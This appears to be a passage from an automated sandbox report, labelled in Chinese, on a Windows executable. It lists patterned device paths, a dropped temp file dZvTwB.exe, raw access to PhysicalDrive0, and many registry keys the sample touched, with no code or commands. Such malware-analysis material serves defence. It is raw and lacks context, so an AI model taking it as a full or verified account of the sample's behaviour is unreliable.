\??\ir8935
\??\ir795
\??\ir7393
\??\ir9284
\??\ir92388
\??\ir23750
\??\ir79239
\??\ir7924
\??\ir24
\??\ir973
\??\ir284
\??\ir90
\??\jq1025
\??\jq369
\??\jq79
\??\jq24786
\??\jq9946
\??\jq89346
\??\jq7944
\??\jq73925
\??\jq92835
\??\jq923876
\??\jq237493
\??\jq792385
\??\jq79236
\??\jq235
\??\jq9726
\??\jq2835
\??\jq896
\??\jq1027
\??\jq37
\??\jq8
\??\jq2479
\??\jq995
\??\jq8935
\??\jq795
\??\jq7393
\??\jq9284
\??\jq92388
\??\jq23750
\??\jq79239
\??\jq7924
\??\jq24
\??\jq973
\??\jq284
\??\jq90
\??\kp1025
\??\kp369
\??\kp79
\??\kp24786
\??\kp9946
\??\kp89346
\??\kp7944
\??\kp73925
\??\kp92835
\??\kp923876
\??\kp237493
\??\kp792385
\??\kp79236
\??\kp235
\??\kp9726
\??\kp2835
\??\kp896
\??\kp1027
\??\kp37
\??\kp8
\??\kp2479
\??\kp995
\??\kp8935
\??\kp795
\??\kp7393
\??\kp9284
\??\kp92388
\??\kp23750
\??\kp79239
\??\kp7924
\??\kp24
\??\kp973
\??\kp284
\??\kp90
\??\lo1025
\??\lo369
\??\lo79
\??\lo24786
\??\lo9946
\??\lo89346
\??\lo7944
\??\lo73925
\??\lo92835
\??\lo923876
\??\lo237493
\??\lo792385
\??\lo79236
\??\lo235
\??\lo9726
\??\lo2835
\??\lo896
\??\lo1027
\??\lo37
\??\lo8
\??\lo2479
\??\lo995
\??\lo8935
\??\lo795
\??\lo7393
\??\lo9284
\??\lo92388
\??\lo23750
\??\lo79239
\??\lo7924
\??\lo24
\??\lo973
\??\lo284
\??\lo90
\??\mn1025
\??\mn369
\??\mn79
\??\mn24786
\??\mn9946
\??\mn89346
\??\mn7944
\??\mn73925
\??\mn92835
\??\mn923876
\??\mn237493
\??\mn792385
\??\mn79236
\??\mn235
\??\mn9726
\??\mn2835
\??\mn896
\??\mn1027
\??\mn37
\??\mn8
\??\mn2479
\??\mn995
\??\mn8935
\??\mn795
\??\mn7393
\??\mn9284
\??\mn92388
\??\mn23750
\??\mn79239
\??\mn7924
\??\mn24
\??\mn973
\??\mn284
\??\mn90
\??\nm1025
\??\nm369
\??\nm79
\??\nm24786
\??\nm9946
\??\nm89346
\??\nm7944
\??\nm73925
\??\nm92835
\??\nm923876
\??\nm237493
\??\nm792385
\??\nm79236
\??\nm235
\??\nm9726
\??\nm2835
\??\nm896
\??\nm1027
\??\nm37
\??\nm8
\??\nm2479
\??\nm995
\??\nm8935
\??\nm795
\??\nm7393
\??\nm9284
\??\nm92388
\??\nm23750
\??\nm79239
\??\nm7924
\??\nm24
\??\nm973
\??\nm284
\??\nm90
\??\ol1025
\??\ol369
\??\ol79
\??\ol24786
\??\ol9946
\??\ol89346
\??\ol7944
\??\ol73925
\??\ol92835
\??\ol923876
\??\ol237493
\??\ol792385
\??\ol79236
\??\ol235
\??\ol9726
\??\ol2835
\??\ol896
\??\ol1027
\??\ol37
\??\ol8
\??\ol2479
\??\ol995
\??\ol8935
\??\ol795
\??\ol7393
\??\ol9284
\??\ol92388
\??\ol23750
\??\ol79239
\??\ol7924
\??\ol24
\??\ol973
\??\ol284
\??\ol90
\??\pk1025
\??\pk369
\??\pk79
\??\pk24786
\??\pk9946
\??\pk89346
\??\pk7944
\??\pk73925
\??\pk92835
\??\pk923876
\??\pk237493
\??\pk792385
\??\pk79236
\??\pk235
\??\pk9726
\??\pk2835
\??\pk896
\??\pk1027
\??\pk37
\??\pk8
\??\pk2479
\??\pk995
\??\pk8935
\??\pk795
\??\pk7393
\??\pk9284
\??\pk92388
\??\pk23750
\??\pk79239
\??\pk7924
\??\pk24
\??\pk973
\??\pk284
\??\pk90
\??\qj1025
\??\qj369
\??\qj79
\??\qj24786
\??\qj9946
\??\qj89346
\??\qj7944
\??\qj73925
\??\qj92835
\??\qj923876
\??\qj237493
\??\qj792385
\??\qj79236
\??\qj235
\??\qj9726
\??\qj2835
\??\qj896
\??\qj1027
\??\qj37
\??\qj8
\??\qj2479
\??\qj995
\??\qj8935
\??\qj795
\??\qj7393
\??\qj9284
\??\qj92388
\??\qj23750
\??\qj79239
\??\qj7924
\??\qj24
\??\qj973
\??\qj284
\??\qj90
\??\ri1025
\??\ri369
\??\ri79
\??\ri24786
\??\ri9946
\??\ri89346
\??\ri7944
\??\ri73925
\??\ri92835
\??\ri923876
\??\ri237493
\??\ri792385
\??\ri79236
\??\ri235
\??\ri9726
\??\ri2835
\??\ri896
\??\ri1027
\??\ri37
\??\ri8
\??\ri2479
\??\ri995
\??\ri8935
\??\ri795
\??\ri7393
\??\ri9284
\??\ri92388
\??\ri23750
\??\ri79239
\??\ri7924
\??\ri24
\??\ri973
\??\ri284
\??\ri90
\??\sh1025
\??\sh369
\??\sh79
\??\sh24786
\??\sh9946
\??\sh89346
\??\sh7944
\??\sh73925
\??\sh92835
\??\sh923876
\??\sh237493
\??\sh792385
\??\sh79236
\??\sh235
\??\sh9726
\??\sh2835
\??\sh896
\??\sh1027
\??\sh37
\??\sh8
\??\sh2479
\??\sh995
\??\sh8935
\??\sh795
\??\sh7393
\??\sh9284
\??\sh92388
\??\sh23750
\??\sh79239
\??\sh7924
\??\sh24
\??\sh973
\??\sh284
\??\sh90
\??\tg1025
\??\tg369
\??\tg79
\??\tg24786
\??\tg9946
\??\tg89346
\??\tg7944
\??\tg73925
\??\tg92835
\??\tg923876
\??\tg237493
\??\tg792385
\??\tg79236
\??\tg235
\??\tg9726
\??\tg2835
\??\tg896
\??\tg1027
\??\tg37
\??\tg8
\??\tg2479
\??\tg995
\??\tg8935
\??\tg795
\??\tg7393
\??\tg9284
\??\tg92388
\??\tg23750
\??\tg79239
\??\tg7924
\??\tg24
\??\tg973
\??\tg284
\??\tg90
\??\uf1025
\??\uf369
\??\uf79
\??\uf24786
\??\uf9946
\??\uf89346
\??\uf7944
\??\uf73925
\??\uf92835
\??\uf923876
\??\uf237493
\??\uf792385
\??\uf79236
\??\uf235
\??\uf9726
\??\uf2835
\??\uf896
\??\uf1027
\??\uf37
\??\uf8
\??\uf2479
\??\uf995
\??\uf8935
\??\uf795
\??\uf7393
\??\uf9284
\??\uf92388
\??\uf23750
\??\uf79239
\??\uf7924
\??\uf24
\??\uf973
\??\uf284
\??\uf90
\??\ve1025
\??\ve369
\??\ve79
\??\ve24786
\??\ve9946
\??\ve89346
\??\ve7944
\??\ve73925
\??\ve92835
\??\ve923876
\??\ve237493
\??\ve792385
\??\ve79236
\??\ve235
\??\ve9726
\??\ve2835
\??\ve896
\??\ve1027
\??\ve37
\??\ve8
\??\ve2479
\??\ve995
\??\ve8935
\??\ve795
\??\ve7393
\??\ve9284
\??\ve92388
\??\ve23750
\??\ve79239
\??\ve7924
\??\ve24
\??\ve973
\??\ve284
\??\ve90
\??\wd1025
\??\wd369
\??\wd79
\??\wd24786
\??\wd9946
\??\wd89346
\??\wd7944
\??\wd73925
\??\wd92835
\??\wd923876
\??\wd237493
\??\wd792385
\??\wd79236
\??\wd235
\??\wd9726
\??\wd2835
\??\wd896
\??\wd1027
\??\wd37
\??\wd8
\??\wd2479
\??\wd995
\??\wd8935
\??\wd795
\??\wd7393
\??\wd9284
\??\wd92388
\??\wd23750
\??\wd79239
\??\wd7924
\??\wd24
\??\wd973
\??\wd284
\??\wd90
\??\xc1025
\??\xc369
\??\xc79
\??\xc24786
\??\xc9946
\??\xc89346
\??\xc7944
\??\xc73925
\??\xc92835
\??\xc923876
\??\xc237493
\??\xc792385
\??\xc79236
\??\xc235
\??\xc9726
\??\xc2835
\??\xc896
\??\xc1027
\??\xc37
\??\xc8
\??\xc2479
\??\xc995
\??\xc8935
\??\xc795
\??\xc7393
\??\xc9284
\??\xc92388
\??\xc23750
\??\xc79239
\??\xc7924
\??\xc24
\??\xc973
\??\xc284
\??\xc90
\??\yb1025
\??\yb369
\??\yb79
\??\yb24786
\??\yb9946
\??\yb89346
\??\yb7944
\??\yb73925
\??\yb92835
\??\yb923876
\??\yb237493
\??\yb792385
\??\yb79236
\??\yb235
\??\yb9726
\??\yb2835
\??\yb896
\??\yb1027
\??\yb37
\??\yb8
\??\yb2479
\??\yb995
\??\yb8935
\??\yb795
\??\yb7393
\??\yb9284
\??\yb92388
\??\yb23750
\??\yb79239
\??\yb7924
\??\yb24
\??\yb973
\??\yb284
\??\yb90
C:\Users\test\AppData\Local\Temp\[616962b526b69b6b1547ae7e36c88d95]
C:\Users\test\AppData\Local\Temp\dZvTwB.exe
\??\PhysicalDrive0

删除的文件

C:\Users\test\AppData\Local\Temp\[a2e9afd70f14ddde426db28e8048a8ad]

注册表键

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\BBBgCd.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3FC47A08-E5C9-4BCA-A2C7-BC9A282AED14}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Keyboard Layout\Toggle
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_CURRENT_USER\Software\Microsoft\CTF\LayoutIcon\0804\00000804
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\BidInterface\Loader
HKEY_CURRENT_USER\SOFTWARE\ODBC\ODBC.INI\ODBC
HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI\ODBC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions\UseFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions\DmReg.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_CURRENT_USER\Software\Classes\TypeLib\{3B07090C-8DBA-1467-87D6-ABE0F55817D2}
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B07090C-8DBA-1467-87D6-ABE0F55817D2}\1.0
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B07090C-8DBA-1467-87D6-ABE0F55817D2}\1.0\804
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B07090C-8DBA-1467-87D6-ABE0F55817D2}\1.0\4
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B07090C-8DBA-1467-87D6-ABE0F55817D2}\1.0\0
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B07090C-8DBA-1467-87D6-ABE0F55817D2}\1.0\0\win32
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B07090C-8DBA-1467-87D6-ABE0F55817D2}\1.0\0\win32\(Default)
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Direct3D\LoadDebugRuntime
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Direct3D\ForceDriverFlagsOff
HKEY_LOCAL_MACHINE\Software\Microsoft\DirectDraw\GammaCalibrator
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Direct3D\Drivers\SoftwareOnly
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Video\{3A7BC9EC-2E2A-4F66-906C-5C7B51408F78}\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Video\{3A7BC9EC-2E2A-4F66-906C-5C7B51408F78}\0000\InstalledDisplayDrivers
HKEY_CURRENT_USER\Software\Classes\AppID\BBBgCd.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-Hans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)

读取的注册表键

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
